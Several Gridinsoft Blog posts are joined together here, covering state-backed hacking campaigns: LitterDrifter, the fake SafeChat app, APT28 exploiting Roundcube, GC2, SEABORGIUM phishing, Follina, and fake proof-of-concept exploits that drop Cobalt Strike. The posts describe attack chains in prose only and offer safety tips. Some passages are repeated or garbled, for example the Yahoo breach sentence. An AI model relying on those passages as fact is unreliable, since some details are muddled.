Who are Gamaredon?

Gamaredon’s unique profile goes beyond its commitment to espionage goals. The Security Service of Ukraine (SSU) has linked Gamaredon personnel to the Russian Federal Security Service (FSB), adding a geopolitical twist to the group’s activities. The FSB, responsible for counterintelligence, antiterrorism, and military surveillance, sheds light on the strategic and state-sponsored nature of Gamaredon’s operations. Despite the ever-changing landscape of its targets, Gamaredon’s infrastructure exhibits consistent patterns, emphasizing the need for careful scrutiny from cybersecurity experts.

What is LitterDrifter?

One of Gamaredon’s tools – the notorious USB-propagating worm, LitterDrifter. This VBS-written malware showcases Gamaredon’s adaptability and innovation. Despite the old name of malware type, it packs quite a lot of functions much needed in modern cyberattacks.

As a part of the APT’s infrastructure, LitterDrifter introduces a global element to Gamaredon’s operations. Beyond its intended targets in Ukraine, this worm has left potential infections in its wake in countries like the USA, Vietnam, Chile, Poland, Germany, and even Hong Kong. The global reach of LitterDrifter adds to the overall potential of the threat actor in globe-scale cyberattacks.

The key functionality of LitterDrifter worm circulates around being the remote access tool. In other words, it is a backdoor with worm-like self-spreading capabilities. It is a hidden unauthorized access point in a computer system, software, or network that allows accessing the target environment. In cyberattacks, backdoors mostly act as initial access and reconnaissance tools, which then “open the gates” for further malware injection.

LitterDrifter doesn’t just spread automatically over USB drives. It introduces a global element to Gamaredon’s operations. Beyond its intended targets in Ukraine, this worm has left potential infections in its wake in countries like the USA, Vietnam, Chile, Poland, Germany, and even Hong Kong. The global reach of LitterDrifter highlights the broader threat it poses to cybersecurity worldwide.

Gamaredon’s Campaign Against Ukraine

Gamaredon Group has exhibited a sustained and targeted cyber espionage campaign against Ukraine and its institutions. It includes military, non-governmental organizations (NGOs), judiciary, law enforcement, and nonprofit entities since at least 2013. The group, suspected to have ties to Russian cyber espionage efforts, has consistently focused on infiltrating Ukrainian entities. It is evident in its choice of Ukrainian language lures and primary targets within the region.

LitterDrifter emerges as yet another tool employed by the group in its multifaceted cyber operations. As revealed through ongoing monitoring and analysis researchers, Gamaredon has utilized LitterDrifter alongside various other techniques and malware to achieve its objectives. This has further strengthened the group’s status as a advanced persistent threat against Ukrainian and allied interests.

Protection against LitterDrifter

As LitterDrifter reveals its global impact, it prompts a call for a unified and fortified global cybersecurity defense. The worm’s ability to transcend borders underscores the importance of international collaboration in addressing and mitigating cyber threats.

Protecting from threats like LitterDrifter requires a combination of proactive cybersecurity practices and vigilance. Here are some recommendations to enhance your protection against such worms:

• Be cautious when inserting USB drives into your computer, especially if they are from unknown or untrusted sources. Consider using USB drives that have read-only switches to prevent unauthorized writing.
• Regularly back up your important data and store backups in a secure location. In the event of a ransomware attack, having recent backups can help you restore your system without paying the ransom.
• Follow security best practices such as using strong, unique passwords, enabling two-factor authentication, and limiting user privileges. These practices can add layers of protection against various cyber threats.
• Keep yourself informed about the latest cybersecurity threats and vulnerabilities. Being aware of the evolving threat landscape enables you to adapt your security measures accordingly.

The post LitterDrifter – Russia’s USB Worm Targeting Ukrainian Entities appeared first on Gridinsoft Blog.

Bahamut Group Exploit Phony Android Application

Recently, analysts came over advanced Android malware that targets individuals in the South Asia region. The malware is disguised as a chatting app known as “SafeChat,” which victims get via WhatsApp. Attackers use social engineering and often lure victims to install a chat app under the pretext of switching to a more secure platform. The app’s interface is typical for all messengers, which is not hard to copy from elsewhere. And that is why it effectively deceives users into thinking it is legitimate and safe. However, it allows the TA to extract all necessary information. The malware exploits Android Libraries to extract and transmit data to a command-and-control server.

It is worth noting that this SafeChat has nothing to do with a legitimate program of the same name. However, Bahamut APT does not try to mimic the one. Most probably, they picked a name exclusively for a clickbait, making no reference to the app’s legitimacy. Though, the original app is not recognized well enough to make its name work as a disguise.

State-Sponsored Activity

According to technical analysis, the Android spyware appears to be a variation of the well-known Coverlm malware. It is notorious for extracting data from popular communication apps such as Telegram, Signal, WhatsApp, Viber, and Facebook Messenger. Indian APT Bahamut group is behind the attack. In addition, the malware exhibits similar tactics used by the notorious APT group, DoNot, but with more permissions. Additionally, based on substantial evidence, experts have linked Bahamut to acting on behalf of a particular state government in India. Sharing the same certificate authority as the DoNot APT group and similar data theft methodologies, a common area of operation, and using Android apps to infect targets suggests close cooperation or overlap between the two groups.

“Safe Chat” Details

As I mentioned above, the Safe Chat app has a misleading interface that gives the impression of a genuine chat application. When first launched, it further manipulates victims by walking them through a seemingly legitimate user registration process, boosting their credibility and serving as a cover for embedded spyware. One of the most essential steps in the infection is the acquisition of permissions to use the Accessibility Services. The app used it to grant additional – and crucial – permissions to the spyware automatically. Having access to Accessbility Services allows the spyware to access the victim’s contact list, SMS, call logs, and external device storage and get accurate GPS location data from the infected device.

Safety tips

Although cyber-attacks are not new, it is always wise to be cautious of such incidents and take measures to ensure your safety. The following are some suggestions to safeguard yourself against SafeChat and other types of malware and maintain your Android device’s security:

• Install Apps from Trusted Sources. For your safety, we recommend that you only download and install apps from official places such as Google Play Store. Please avoid installing apps from unknown sources, which may contain harmful malware.
• Check App Permissions. It’s essential to be careful when downloading apps that request unnecessary permissions. If an app asks for access to sensitive data or unnecessary features for regular use, think twice before installing it.
• Keep Your Device Updated. It is essential to regularly update your Android device with the latest software and security patches. Manufacturers release these updates to fix any vulnerabilities and make your device more secure.
• Use Security Apps. Installing a trustworthy antivirus or security application from a reliable source is recommended to conduct regular scans on your device for potential threats and malware.

The post Bahamut APT Targets Users With Fake SafeChat App appeared first on Gridinsoft Blog.

As a reminder, we previously reported on the divergence of hacker groups, some siding with Russia and others with Ukraine. Additionally, Microsoft accused Russia of cyberattacks against Ukraine’s allies.

Recent media coverage also highlighted the arrest of two members of the DoppelPaymer Group by law enforcement in Germany and Ukraine.

The report details that the attackers, employing spear phishing and bait emails, capitalized on the Russian invasion of Ukraine. The hackers crafted spear-phishing emails with news topics related to Ukraine, appearing as legitimate media content.

The campaign demonstrated a high level of readiness by hackers who quickly turned news content into bait for recipients. The spear-phishing emails contained news topics related to Ukraine, with topics and content reflecting legitimate media sources.

Recipients were compelled to open the malicious messages, exploiting old vulnerabilities in Roundcube (CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026) to compromise unpatched servers—requiring no user interaction with malicious attachments.

The attachment contained JavaScript code that executed additional JavaScript payloads from BlueDelta controlled infrastructure.

If the compromise succeeded, the attackers deployed malicious scripts redirecting incoming messages to an email address under their control. These scripts were also employed to locate and pilfer victims’ address books, session cookies, and other data stored in the Roundcube database.

Researchers suggest that the infrastructure used in these attacks has been active since around November 2021, with APT28‘s activities focused on “gathering military intelligence.”

We have identified BlueDelta activity, most likely targeted at the regional Ukrainian prosecutor’s office and the [unnamed] central executive body of the country, and also found intelligence activities associated with other Ukrainian state structures and organizations, including those involved in the modernization and repair of infrastructure for the Ukrainian military aviation.

This collaboration between Recorded Future and CERT-UA emphasizes the crucial role of partnerships between organizations and governments in ensuring collective defense against strategic threats—particularly in the context of Russia’s ongoing conflict with Ukraine.

The post APT28 Attacked Ukrainian and Polish Organizations appeared first on Gridinsoft Blog.

Let me remind you that we also wrote that Chinese Hackers Injected a Backdoor into the MiMi Messenger, and more that Chinese Hackers Use Ransomware As a Cover for Espionage.

And also information security specialists reported that Three Chinese APT Groups Attack Major Telecommunications Companies.

The Google Threat Analysis Group (TAG) links this campaign to the hacker group HOODOO, also known as APT41, Barium, Bronze Atlas, Wicked Panda and Winnti. Typically, this grouping targets a wide range of industries in the US, Asia, and Europe.

Google Command and Control is an open source project written in Go and developed specifically for the red team.

Essentially, the project consists of an agent that is deployed to compromised devices and then connects to a Google Sheets URL to receive commands to execute. The received commands force the agent to download and install additional payloads from Google Drive or, on the contrary, steal data, “uploading” it to the cloud storage.

According to the TAG report, APT41 attacks start from phishing emails containing links to a password-protected file hosted on Google Drive. This file contains GC2, which penetrates the victim’s system.

While it is not known what additional malware was distributed with GC2 this time around, APT41 typically deploys a wide range of malware on compromised systems. For example, a 2019 report by Mandiant explained that attackers use rootkits, bootkits, custom malware, backdoors, PoS malware, and in some cases even ransomware in their campaigns.

The researchers write that this find is notable for two reasons: first, it shows that Chinese hackers are increasingly relying on freely available and open-source tools to make attacks more difficult to attribute. Second, it points to the growing proliferation of malware and tools written in Go, which is popular with attackers due to its cross-platform and modular nature.

Google also warned that “the undeniable importance of cloud services” has made them a profitable target for both “government” hackers and ordinary cybercriminals, who are increasingly using them “either as hosts for malware or as C2 infrastructure”.

The post Chinese Hackers Use Google Command & Control Capabilities in Attacks appeared first on Gridinsoft Blog.

What is a Security Breach?

First of all, let’s have a look at the definitions. A security breach is when an intruder bypasses security mechanisms and gets access to data, apps, networks, or devices. Despite their close relations, there’s a difference between security breaches and data breaches. A security breach is more about getting access as such – like breaking into someone’s house. On the other hand, the data breach results from a security breach – as the latter may aim at tasks other than leaking data. It is instead a specific consequence of security breaches.

What are the types of Security Breaches?

Threat actors may create a security breach in different ways, depending on their victim and intentions. Here are the three most important ones.

1. Malware injection

Cybercriminals often employ malicious software to infiltrate protected systems. Viruses, spyware, and other malicious software are transmitted via email or downloaded from the Internet. For instance, you might receive an email that contains an attachment – generally, an MS Office document. Moreover opening that file can end up infecting your PC. You may also download a malicious program from the Internet without any tricky approaches. Often hackers will target your computer to get money and steal your data, which they can sell on the Darknet or other appropriate places.

2. Man-in-the-Middle-attack

As the name says, the assailant’s route is in the middle. Now we’ll determine what it means. Also hacker can intercept communications between two parties, which results in one party receiving a false message, or the entire communication log may be compromised. Such an attack is often carried out due to hacked network equipment, such as a router. However, some malware examples may fit that purpose as well.

3. Insider threat

Insider threat is the danger of a person from within the company using their position to utilize their authorized access to commit a cybercrime. This harm can include malicious, negligent, or accidental actions that negatively affect the organization’s security, confidentiality, or availability. Other stakeholders may find this general definition more appropriate and valuable to their organization. CISA defines an insider threat as the danger that an insider will knowingly or unknowingly misuse his authorized access. It does so to harm the department’s mission, resources, personnel, facilities, information, equipment, networks, or systems. This danger can be manifested through the following behaviors of insiders:

• Corruption, including participation in transnational organized crime
• Terrorism
• Sabotage
• Unauthorized disclosure of information

4. Advanced persistent threat

An advanced persistent threat is a persistent cyberattack that employs advanced tactics to remain undetected in a network for an extended time to steal information. An APT attack is meticulously planned and executed to infiltrate a specific organization, circumvent existing security measures and remain undetected. Also APT attacks are more complex and require more advanced planning than traditional cyberattacks. Adversaries are typically well-funded, experienced teams of cybercriminals that target organizations with a high value. They’ve devoted significant time and resources to investigating and identifying vulnerabilities within the organization.

Examples of Security Breaches

Recent high-profile breaches include:

• Facebook: In 2021, the personal information of over half a billion Facebook users was leaked, including phone numbers, dates of birth, locations, email addresses, and more. As a result, the attack was a zero-day exploit that allowed hackers to harvest a large amount of data from the company’s servers.
• Equifax: In 2017, the US credit bureau Equifax experienced a security breach via a third-party software vulnerability that was similar to the EternalBlue exploit. Fraudsters gained access to the personal information of over 160 million people; this is considered one of the most significant identity theft cyber crimes to date.
• Yahoo!: In 2016, 200 million Yahoo users were active. A schedule of usernames and passwords for Amazon accounts posted for sale on the dark web. Yahoo! The company blamed the breach on “state-sponsored hackers,” who could manipulate cookie data to gain access to user accounts.
• eBay: In 2014, it experienced a severe security breach resulting in the widespread disclosure of personal information.

How to help Protect yourself from a Security Breach

Monitor your accounts and devices

After a security incident, closely monitor your accounts and devices for any unusual activity. If one is present, ask the site administrator to suspend your account and help prevent the threat actor from accessing it.

Change your passwords

Choose complex passwords on all devices that need configuring. Ensure that you pay special attention to routers and utilize public Wi-Fi. Remember to update your password frequently. The password must include all upper and lower case letters, numbers, and special characters.

Contact your financial institution

Contact your bank immediately to prevent fraudulent transactions if your credit card or other financial information is compromised. They can tell you what the problem is and how to fix it. Sometimes, it may take time to resolve issues with your card. The best thing to do in these cases is to block your card so that fraudsters can’t withdraw money from it.

Perform an antivirus scan

If someone has gained access to your computer or home network, they may be infected with malware. Use a reliable antivirus software to identify and remove any threats that may be present. Run an initial scan to determine if your computer has any issues or bugs. Depending on the scan you run, it may take time for the scan to complete. The default is to run a quick scan. The standard scan is recommended, but it takes longer.

Report the incident to the appropriate authorities

Contact your local law enforcement agency if you’ve been the victim of identity theft or fraud. They will assist you in the necessary steps to regain control over your accounts.

You should know that avoiding any attack is possible if you take the proper steps to protect yourself. This requires creating strong passwords, using two-factor authentication, and keeping track of your credentials with a strong password manager.

Good digital hygiene also includes using comprehensive security and privacy software to prevent threats from infiltrating your devices and protecting your data. This makes it harder for hackers to enter your device, get your data, and sell it on third-party paywalls.

The post Security Breach appeared first on Gridinsoft Blog.

As a reminder, we previously reported the discovery of a new version of malware from Russian hackers called LOLI Stealer.

The APT group, referred to as SEABORGIUM by Microsoft, has been under researchers’ scrutiny since at least 2017. Other companies track SEABORGIUM under names such as COLDRIVER (Google), Callisto Group (F-Secure), and TA446 (Proofpoint). The group is suspected of carrying out cyber-espionage attacks against military personnel, government officials, think tanks, and journalists in NATO countries, the Baltics, Scandinavia, and Eastern Europe.

In target countries, SEABORGIUM primarily focuses its operations on defense, intelligence, and consulting companies, non-governmental and international organizations, think tanks, and universities. SEABORGIUM has been seen in attacks on former intelligence officers, experts on Russia, and Russian citizens abroad.

MSTIC analysts detail that SEABORGIUM members create fake online identities through email, social media, and LinkedIn accounts. These fake identities are then used in social engineering attacks against targeted individuals and organizations.

Operating under these fake personas, attackers initiate contact with targets to establish conversations and eventually send phishing attachments. Microsoft reveals that the hackers distribute emails with PDF attachments, links to file-sharing sites, or OneDrive accounts hosting PDF documents.

Upon opening such a file, the victim encounters a message stating that the document cannot be viewed, and a special button must be pressed to try again.

Clicking the button redirects the victim to a landing page running a phishing framework, such as EvilGinx, displaying a login form. Acting as a proxy, EvilGinx enables hackers to intercept and steal entered credentials, along with cookies/authentication tokens generated after login.

These stolen tokens enable attackers to access the compromised user account, even if the victim has two-factor authentication enabled.

According to Microsoft, once access is gained, hackers either pilfer emails and attachments or set up forwarding rules to receive all incoming emails in the victim’s compromised account. The researchers also observed attackers using a hacked account to negotiate on behalf of the victim to obtain confidential information.

MSTIC reports taking several steps to disrupt SEABORGIUM’s malicious campaign, including disabling accounts used for spying, phishing, and email harvesting.

The company has also shared indicators of compromise, including 69 domains associated with the group’s phishing campaigns, utilized to steal credentials from Microsoft, ProtonMail, and Yandex accounts.

The post Disrupting SEABORGIUM’s Ongoing Phishing Operations appeared first on Gridinsoft Blog.

The plot thickens as the adversaries deploy cunning tactics, leveraging phishing emails as Trojan horses, delivering malevolent Office documents armed with Bisonal—the underworld’s go-to Remote Access Trojan (RAT). Like a cyber echo, these same techniques reverberated across borders, targeting unsuspecting victims in Pakistani organizations, a sinister symphony meticulously observed by the sharp minds at SentinelLabs.

In the grand theater of digital warfare, China takes center stage, orchestrating a myriad of campaigns against Russia, a retaliatory crescendo following its invasion of Ukraine.

On June 22nd 2022 CERT-UA made a public release of Alert #4860 that presents several documents built with the help of Royal Road malicious document builder and constructed to reflect Russian government interests. Specialists from SentinelLabs analyzed further the report by CERT-UA and confirmed the involvement of a Chinese APT group.

The malicious activity comes amidst other Chinese attacks against Russia such as Space Pirates, Mustang Panda, Scarab, but here it is separate Chinese activity. The specific actor’s identity is unclear so far, although it remains clear that Chinese APT groups aim to target a wide range of different Russian organizations.

Who may be behind the attack?

SentinelLabs specialists speculate that the Tonto Team APT (“Earth Akhlut”, “CactusPete”) group, reported for nearly a decade, might be the potential culprit behind the attacks. However, they emphasize that it is premature to draw definitive conclusions based on the current available data.

The malicious documents are generally used for the delivery of custom malware, such as the Bisonal RAT, which as noted by CERT-UA, is unique to Chinese groups, including Tonto Team. Bisonal has a uniquely long history of use and continued development by its creators, such as expanding features for file searching and exfiltration, anti-analysis and detection techniques, and maintaining generally unrestricted system control,” goes in a report published by SentinelLabs.

Tonto Team APT group also targeted multiple victims across the globe including the targets of their particular interest in Northeast Asia such as private businesses, critical infrastructure, governments, etc. The group has been particular in their interests in Russian targets for the past years but recently in this direction specialists observed a significant spike of activity.

We assess with high confidence that the Royal Road-built malicious documents, delivered malware, and associated infrastructure are attributable to Chinese threat actors. Based on our observations, there’s been a continued effort to target Russian organizations by this cluster through well-known attack methods– the use of malicious documents exploiting n-day vulnerabilities with lures specifically relevant to Russian organizations,” also goes in a report by researchers.

On the whole the purpose of the attacks seems to be espionage-related, but that’s a limited assumption because of external visibility of the researchers’ standpoint.

The post Russian Organizations Under Attack By Chinese APTs appeared first on Gridinsoft Blog.

Researchers also assume that the activity might have been conducted earlier, but so far they traced back it to at least December 2021. It is believed that among the goals of the operation was to steal passport scans, access to email accounts and personal information.

Many high profile targets of the operation included people like:

• Senior executive that works in the Israeli defense industry;
• Former Chair, that once worked at one of the most known Middle East research centers;
• A person, who was Former US Ambassador to Israel;
• Chair, that currently works in one of Israel’s leading security think tanks;
• Former Major General, who once had the position in a high position at the IDF (Israel Defense Forces);
• Tzipi Livni, who was a former Foreign Minister and Deputy Prime Minister of Israel.

To conduct the attacks, threat actors took control over existing email accounts of senior officials and pretended to be them engaged in long correspondence with targets or inserted themselves into existing conversations between executives and other persons.

It’s not the first time Israeli officials have become targets to Iranian threat actors via email attacks

The spoofed emails in the attack included phishing pages from Yahoo, links to upload some documents’ scans, faked invitations to a conference or research or links to other real documents relevant to the target.

One of Israeli former high officials who was Israeli Former Foreign Minister received one of the faked emails coming from another senior official who was a well known former Major General in the IDF.

The email appeared to have a genuine address and which the Former Foreign Minister had correspondence in the past with.

Tzipi Livni, Former Israeli Foreign Minister was approached by someone via a hijacked email account of a former Major General in the IDF with a link to a file which she was asked to open and see.

When she postponed the action she was approached again with another email from the same address asking her again to open the email. This brought some suspicions to the former executive.

She met the former Major General in person and asked about the emails which turned out he never actually sent.

Iranian Phosphorus APT group is supposedly behind these spear phishing attacks

CPR researchers assume that an Iranian-backed entity is responsible for the attacks. They note that all possible evidence points to the operation of the Iran-attributed Phosphorus APT group.

This well known group has a long history of targeting high profile officials mainly from Israel thus propagating the interests of the Iranian regime.

How To Recognize Phishing Emails

But not only high profile officials can be the targets of phishing because ordinary people also become one. To know if you possibly received a phishing email look for the next signs to confirm or discard suspicions:

• Fake Domains. If you received some unexpected email and you are not sure if it’s legit the best first thing would be to look at its domain where this email came from. Often to downplay your attention, threat actors will create domains that at a first glance look like legit one which in reality aren’t.
  For example, you may receive an email from what appears to be the lionsbank.com domain of your bank but if you look closely you may spot a difference. Instead of lionsbank.com it can be something like lionsdank.com;
• Suspicious Requests. Phishing emails exist to steal your personal information, money, credentials and if you are asked to produce one of those or other unusual or suspicious requests the sure thing is that you’re dealing with a phishing email;
• Psychological Tricks. If you feel that the email you received reads a little coercive it means that most likely you’re dealing with phishing. They urge you to do something, even threaten with some legal consequences to do what the email asks. No doubt it’s a phishing.

What Other Sings Hint At Phishing

First of all, the received email gives you a sense of urgency.

Recipients are advised that something needs to be done right away unless you don’t want unpleasant consequences.

It is done so because a person in a hurry is less likely to think of the genuity of the received email.

The second popular phishing trick is to send email from some authority. In this case most likely threat actors will conduct business email compromise (BEC) scams and similar spear phishing tricks that are commonly disguised as if to be sent from a CEO or someone else in authority.

Phishing emails with such tone prove the fact that people are sometimes too inclined to believe emails coming from someone in authority to be surely legit.

Another popular method among threat actors but usually not among those targeting high profile persons is to threaten a recipient or blackmail them.

They put a requirement that if a recipient doesn’t do what they ask they will either leak some sensitive information or destroy other valuable information.

Fear is what in such cases makes the phishing attempt successful. People fear to be punished or feel embarrassment and that’s what makes the recipient comply with phishers’ requests.

And the last thing to mention is that if you suspect that the email you received might be phishing it will be better not to do anything with it. Don’t open any attachments, don’t click on any links in it and, of course, don’t reply with anything.

It will be better just to delete that email or report to the IT team if you received such an email at work.

The post Iranian Spear-Phishing Operation Targets US And Israeli High Executives appeared first on Gridinsoft Blog.

Understanding the Follina Vulnerability

On May 27, 2022, the public became aware of a remote code execution (RCE) vulnerability, known as Follina. Soon after its disclosure, experts observed several instances of exploitation.

Follina (CVE-2022-30190) is a vulnerability identified in the Microsoft Support Diagnostic Tool (MSDT), enabling RCE on all susceptible systems. The exploitation occurs via the ms-msdt protocol handler scheme.

To exploit Follina successfully, threat actors don’t require the use of macros to entice victims. Instead, they deploy a specially crafted Word Document.

This document, through Word’s template feature, downloads and loads a malicious HTML file. Consequently, threat actors gain the ability to execute PowerShell code within targeted Windows systems.

Microsoft has issued multiple workarounds and advisories to mitigate the vulnerability’s risk.

Functioning of the Follina Vulnerability

Upon the dissemination of this vulnerability’s details online, threat actors eagerly commenced the installation of their payloads.

For a successful Follina exploit, threat actors employ HTML documents executed under WinWord. The execution initiates the msdt.exe process as a child process.

Registry protocol handler entry enables these processes. Subsequently, Sdiagnhost.exe gets activated, the Scripted Diagnostics Native Host that facilitates the creation of the final payload—in Follina’s case, PowerShell.

AsyncRAT and Browser Infostealer via Follina Vulnerability

It has been observed that threat actors deployed a diverse range of payloads in successful exploitation instances. One instance involved deploying the remote access Trojan AsyncRAT, complete with a valid digital signature.

Upon execution, this trojan verifies the presence of antivirus software. However, its primary function is to gather various system information, such as operating system details, executed paths, usernames, hardware identification, and transmit it to a command-and-control (C&C) server.

Once its task is complete, the malware awaits further commands from the C&C server and executes them on the compromised system.

Another payload instance was a browser infostealer, targeting various browser data such as saved login credentials and cookies from browsers like Edge, Chrome, and Firefox.

Patching the Follina Vulnerability

While most exploits of the vulnerability occur through malicious documents, researchers have discovered alternative methods enabling successful Follina exploitation, including manipulation of HTML content in network traffic.

“While the malicious document approach is highly concerning, the less documented methods by which the exploit can be triggered are troubling until patched,” said Tom Hegel, senior threat researcher at security firm SentinelOne. “I would expect opportunistic and targeted threat actors to use this vulnerability in a variety of ways when the option is available—it’s just too easy.”

The Follina flaw was initially noticed in August 2020 by an undergraduate researcher and reported to Microsoft on April 21. The company has proposed mitigations, including using Microsoft Defender Antivirus for monitoring and blocking exploitation and disabling a specific protocol within the Support Diagnostic Tool.

Microsoft acknowledged that the vulnerability has been exploited and has already patched the issue. However, the company is yet to classify the vulnerability as a ‘zero-day’ or previously unknown vulnerability.

APT actors utilizing the vulnerability

More alarmingly, the Follina vulnerability has been observed as part of longer infection chains. For example, security firm Proofpoint observed Chinese APT actor TA413 sending malicious URLs disguised as emails from the Central Tibetan Administration.

The vulnerability has been employed at different stages in threat actor infection chains, depending on the tactics and toolkits used.

It has been used against numerous targets in Nepal, Belarus, the Philippines, India, and Russia. Proofpoint’s vice president of threat research, Sherrod DeGrippo, identified multiple instances of vulnerability exploitation within phishing campaigns.

The vulnerability affects all supported Windows versions, Office ProPlus, Office 2021, Office 2013 through 2019, and Microsoft Office 365, receiving a 7.8 CVSS score.

Government workers impacted by the vulnerability

In addition to targeting various entities across different countries, specialists report attacks on government workers leveraging this vulnerability.

State-sponsored hackers attempted to exploit the Follina vulnerability in Microsoft Office against U.S. and E.U government targets through a phishing campaign.

So far researchers have not identified which government was behind an attack.

Malicious emails of the phishing campaign contained alluring texts promising in fake recruitment pitches 20 percent boost in salary. To learn more recipients were urged to open an accompanying email attachment.

Sherrod DeGrippo, vice president of threat research at Proofpoint in Twitter tweeted about the similar incident where about 10 company’s customers received over 1,000 messages with the same text.

The post Attackers Exploit MSDT Follina Bug to Drop RAT appeared first on Gridinsoft Blog.

Let me remind you that we also wrote that Emotet now installs Cobalt Strike beacons.

Cyble analysts report that malware disguised as PoC exploits for a pair of Windows vulnerabilities (CVE-2022-24500 and CVE-2022-26809) recently appeared on GitHub, which Microsoft patched as part of the April “update Tuesday”.

Fake exploits were published in the repositories of the user rkxxz, which have now been deleted along with the account itself. As always happens after the publication of PoC exploits, the news quickly spread on Twitter and even attracted the attention of attackers on hacker forums.

You might also be curious to know what Cybersecurity Experts Analyzed the Methods of a Group of Russian Hackers Wizard Spider.

And it soon became clear that the exploits were actually fake, and Cobalt Strike beacons were installed on people’s devices. Cyble analysts have taken a closer look at the fake PoCs and found that they are written in .NET and pretend to exploit the IP address, in fact infecting users with a backdoor.

The deobfuscated exploit sample showed that the fake PoC runs a PowerShell script that executes another gzip-compressed PowerShell script (VirusTotal) to inject the beacon into memory.

The researchers note that this is not the first case of targeted attacks on cybersecurity experts. The fact is that by attacking members of the cybersecurity community, in theory, attackers not only gain access to data on vulnerability research (which the victim can work on), but can also gain access to the network of a cybersecurity company. And this can be a real gold mine for hackers.

Cobalt Strike is a legitimate commercial tool built for pentesters and red teams and focused on operations and post-operations. Unfortunately, it has long been loved by hackers ranging from government APT groups to ransomware operators.

Although the tool is not available to ordinary users, attackers still find ways to use it (for example, rely on old, pirated, hacked and unregistered versions).

The post Fake Exploits Used to Deliver Cobalt Strike Beacons appeared first on Gridinsoft Blog.